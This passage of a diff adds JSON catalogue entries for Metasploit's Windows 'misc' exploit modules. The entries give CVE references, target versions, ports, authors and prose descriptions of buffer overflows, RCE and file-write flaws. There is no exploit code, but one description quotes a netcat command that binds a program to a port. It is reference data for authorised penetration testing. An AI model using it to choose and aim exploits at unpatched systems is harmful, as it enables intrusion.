"mod_time": "2023-09-04 16:46:14 +0000", + "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/ivanti_avalanche_mdm_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/landesk_aolnsrvr": { + "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", + "fullname": "exploit/windows/misc/landesk_aolnsrvr", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-04-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.", + "references": [ + "CVE-2007-1674", + "OSVDB-34964", + "URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html" + ], + "platform": "Windows", + "arch": "", + "rport": 65535, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Alerting Proxy 2000/2003/XP", + "Alerting Proxy 2003 SP1-2 (NX support)", + "Alerting Proxy XP SP2 (NX support)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb", + "is_install_path": true, + "ref_name": "windows/misc/landesk_aolnsrvr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/lianja_db_net": { + "name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow", + "fullname": "exploit/windows/misc/lianja_db_net", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-22", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a stack buffer 
overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.", + "references": [ + "CVE-2013-3563", + "OSVDB-93759" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", + "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/lianja_db_net.rb", + "is_install_path": true, + "ref_name": "windows/misc/lianja_db_net", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/manageengine_eventlog_analyzer_rce": { + "name": "ManageEngine EventLog Analyzer Remote Code Execution", + "fullname": "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-07-11", + "type": "exploit", + "author": [ + "xistence " + ], + "description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. 
This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.", + "references": [ + "EDB-38173", + "CVE-2015-7387", + "URL-https://seclists.org/fulldisclosure/2015/Sep/59" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/manageengine_eventlog_analyzer_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/mercury_phonebook": { + "name": "Mercury/32 PH Server Module Buffer Overflow", + "fullname": "exploit/windows/misc/mercury_phonebook", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-12-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. 
This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.", + "references": [ + "CVE-2005-4411", + "OSVDB-22103", + "BID-16396" + ], + "platform": "Windows", + "arch": "", + "rport": 105, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP0/SP1 English", + "Windows 2000 Pro English ALL" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mercury_phonebook.rb", + "is_install_path": true, + "ref_name": "windows/misc/mercury_phonebook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mini_stream": { + "name": "Mini-Stream 3.0.1.1 Buffer Overflow", + "fullname": "exploit/windows/misc/mini_stream", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-25", + "type": "exploit", + "author": [ + "Unknown", + "Ron Henry " + ], + "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2009-5109", + "OSVDB-61341", + "EDB-10745" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 ENG", + "Windows XP SP2 ENG" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mini_stream.rb", + "is_install_path": true, + "ref_name": "windows/misc/mini_stream", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mirc_privmsg_server": { + "name": "mIRC PRIVMSG Handling Stack Buffer Overflow", + "fullname": "exploit/windows/misc/mirc_privmsg_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-02", 
+ "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.", + "references": [ + "CVE-2008-4449", + "OSVDB-48752", + "BID-31552", + "EDB-6666" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/mirc_privmsg_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mobile_mouse_rce": { + "name": "Mobile Mouse RCE", + "fullname": "exploit/windows/misc/mobile_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-09-20", + "type": "exploit", + "author": [ + "h00die", + "CHOKRI HAMMEDI" + ], + "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n to deploy a payload and run it from the server. 
This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.6.0.4, current at the time of module writing", + "references": [ + "EDB-51010", + "URL-https://mobilemouse.com/" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 9099, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-09-27 14:51:03 +0000", + "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/mobile_mouse_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/ms07_064_sami": { + "name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow", + "fullname": "exploit/windows/misc/ms07_064_sami", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. 
This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 8.0.", + "references": [ + "CVE-2007-3901", + "OSVDB-39126", + "MSB-MS07-064", + "BID-26789" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ms07_064_sami.rb", + "is_install_path": true, + "ref_name": "windows/misc/ms07_064_sami", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ms10_104_sharepoint": { + "name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution", + "fullname": "exploit/windows/misc/ms10_104_sharepoint", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-14", + "type": "exploit", + "author": [ + "Oleksandr Mirosh", + "James Burton", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. 
The\n software contains a directory traversal, that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.", + "references": [ + "CVE-2010-3964", + "OSVDB-69817", + "BID-45264", + "MSB-MS10-104", + "ZDI-10-287" + ], + "platform": "Windows", + "arch": "", + "rport": 8082, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb", + "is_install_path": true, + "ref_name": "windows/misc/ms10_104_sharepoint", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/netcat110_nt": { + "name": "Netcat v1.10 NT Stack Buffer Overflow", + "fullname": "exploit/windows/misc/netcat110_nt", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-12-27", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. 
The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".", + "references": [ + "CVE-2004-1317", + "OSVDB-12612", + "BID-12106", + "EDB-726" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal nc.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/netcat110_nt.rb", + "is_install_path": true, + "ref_name": "windows/misc/netcat110_nt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/nettransport": { + "name": "NetTransport Download Manager 2.90.510 Buffer Overflow", + "fullname": "exploit/windows/misc/nettransport", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-02", + "type": "exploit", + "author": [ + "Lincoln", + "dookie" + ], + "description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. 
This module was tested\n successfully against version 2.90.510.", + "references": [ + "CVE-2017-17968", + "OSVDB-61435", + "EDB-10911" + ], + "platform": "Windows", + "arch": "", + "rport": 22222, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/nettransport.rb", + "is_install_path": true, + "ref_name": "windows/misc/nettransport", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/nvidia_mental_ray": { + "name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection", + "fullname": "exploit/windows/misc/nvidia_mental_ray", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Donato Ferrante", + "Ben Campbell " + ], + "description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via an UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. 
This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.", + "references": [ + "URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf", + "OSVDB-100827" + ], + "platform": "Windows", + "arch": "", + "rport": 7414, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb", + "is_install_path": true, + "ref_name": "windows/misc/nvidia_mental_ray", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/plugx": { + "name": "PlugX Controller Stack Buffer Overflow", + "fullname": "exploit/windows/misc/plugx", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-07-27", + "type": "exploit", + "author": [ + "Professor Plum" + ], + "description": "This module exploits a stack buffer overflow in the PlugX Controller (C2 server).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 13579, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PlugX Type I (old)", + "PlugX Type I", + "PlugX Type II" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/misc/plugx.rb", + "is_install_path": true, + "ref_name": "windows/misc/plugx", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poisonivy_21x_bof": { + "name": "Poison Ivy 2.1.x C2 Buffer Overflow", + "fullname": "exploit/windows/misc/poisonivy_21x_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-06-03", + "type": "exploit", + "author": [ + "Jos Wetzels" + ], + "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server 
communication.", + "references": [ + "URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware" + ], + "platform": "Windows", + "arch": "", + "rport": 3460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Poison Ivy 2.1.4 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/poisonivy_21x_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poisonivy_bof": { + "name": "Poison Ivy Server Buffer Overflow", + "fullname": "exploit/windows/misc/poisonivy_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-24", + "type": "exploit", + "author": [ + "Andrzej Dereszowski", + "Gal Badishi", + "juan vazquez ", + "Jos Wetzels" + ], + "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", + "references": [ + "OSVDB-83774", + "EDB-19613", + "URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf", + "URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/" + ], + "platform": "Windows", + "arch": "", + "rport": 3460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", + "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", + "Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poisonivy_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/poisonivy_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/misc/poppeeper_date": { + "name": "POP Peeper v3.4 DATE Buffer Overflow", + "fullname": "exploit/windows/misc/poppeeper_date", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", + "references": [ + "CVE-2009-1029", + "OSVDB-53560", + "BID-34093" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "POP Peeper v3.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poppeeper_date.rb", + "is_install_path": true, + "ref_name": "windows/misc/poppeeper_date", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poppeeper_uidl": { + "name": "POP Peeper v3.4 UIDL Buffer Overflow", + "fullname": "exploit/windows/misc/poppeeper_uidl", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. 
This\n module is based off of krakowlabs code.", + "references": [ + "OSVDB-53559", + "CVE-2009-1029", + "BID-33926" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "POP Peeper v3.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poppeeper_uidl.rb", + "is_install_path": true, + "ref_name": "windows/misc/poppeeper_uidl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/realtek_playlist": { + "name": "Realtek Media Player Playlist Buffer Overflow", + "fullname": "exploit/windows/misc/realtek_playlist", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-12-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-5664", + "OSVDB-50715", + "BID-32860" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/realtek_playlist.rb", + "is_install_path": true, + "ref_name": "windows/misc/realtek_playlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/remote_control_collection_rce": { + "name": "Remote Control Collection RCE", + "fullname": "exploit/windows/misc/remote_control_collection_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-09-20", + "type": "exploit", + "author": [ + "h00die", + "H4rk3nz0" + ], + 
"description": "This module utilizes the Remote Control Server's, part\n of the Remote Control Collection by Steppschuh, protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.1.1.12, current at the time of module writing", + "references": [ + "URL-http://remote-control-collection.com", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 1926, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-10-28 15:03:39 +0000", + "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/remote_control_collection_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/remote_mouse_rce": { + "name": "Remote Mouse RCE", + "fullname": "exploit/windows/misc/remote_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-15", + "type": "exploit", + "author": [ + "h00die", + "0RPHON", + "H4rk3nz0" + ], + "description": "This module utilizes the Remote Mouse Server by Emote Interactive protocol\n to deploy a payload and run it from the server on versions < 4.200 (500 server response).\n This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 4.110, current at the time of module writing", + "references": [ + "EDB-46697", + "CVE-2022-3365", + "URL-https://www.remotemouse.net/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py" + ], 
+ "platform": "Windows", + "arch": "x64, x86", + "rport": 1978, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-10-17 15:30:17 +0000", + "path": "/modules/exploits/windows/misc/remote_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/remote_mouse_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/sap_2005_license": { + "name": "SAP Business One License Manager 2005 Buffer Overflow", + "fullname": "exploit/windows/misc/sap_2005_license", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-01", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. 
By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.", + "references": [ + "OSVDB-56837", + "CVE-2009-4988", + "BID-35933", + "EDB-9319" + ], + "platform": "Windows", + "arch": "", + "rport": 30000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sap Business One 2005 B1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/sap_2005_license.rb", + "is_install_path": true, + "ref_name": "windows/misc/sap_2005_license", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/sap_netweaver_dispatcher": { + "name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow", + "fullname": "exploit/windows/misc/sap_netweaver_dispatcher", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-08", + "type": "exploit", + "author": [ + "Martin Gallo", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. 
The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", + "references": [ + "OSVDB-81759", + "CVE-2012-2611", + "BID-53424", + "EDB-20705", + "URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities", + "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol" + ], + "platform": "Windows", + "arch": "", + "rport": 3200, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", + "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb", + "is_install_path": true, + "ref_name": "windows/misc/sap_netweaver_dispatcher", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/shixxnote_font": { + "name": "ShixxNOTE 6.net Font Field Overflow", + "fullname": "exploit/windows/misc/shixxnote_font", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-10-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.", + "references": [ + "CVE-2004-1595", + "OSVDB-10721", + "BID-11409" + ], + "platform": "Windows", + "arch": "", + "rport": 2000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ShixxNOTE 6.net Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/shixxnote_font.rb", + "is_install_path": true, + "ref_name": "windows/misc/shixxnote_font", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, 
+ "needs_cleanup": null + }, + "exploit_windows/misc/solarwinds_amqp_deserialization": { + "name": "SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE", + "fullname": "exploit/windows/misc/solarwinds_amqp_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-10-19", + "type": "exploit", + "author": [ + "Justin Hong", + "Lucas Miller", + "Piotr Bazydło", + "Spencer McIntyre" + ], + "description": "The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the\n AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted\n message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\\SYSTEM.", + "references": [ + "CVE-2022-38108", + "URL-https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor", + "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 5671, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-03-23 17:28:17 +0000", + "path": "/modules/exploits/windows/misc/solarwinds_amqp_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/solarwinds_amqp_deserialization", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": { + "name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write", + "fullname": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-02-22", + "type": "exploit", + "author": [ + "Mohamed 
Shetta ", + "bcoles " + ], + "description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then upload another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).", + "references": [ + "CVE-2014-100015", + "EDB-31831", + "OSVDB-103671" + ], + "platform": "Windows", + "arch": "", + "rport": 30000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", + "SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb", + "is_install_path": true, + "ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/splayer_content_type": { + "name": "SPlayer 3.7 Content-Type Buffer Overflow", + "fullname": "exploit/windows/misc/splayer_content_type", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-04", + "type": "exploit", + "author": [ + "xsploitedsec ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in SPlayer v3.7 or prior. 
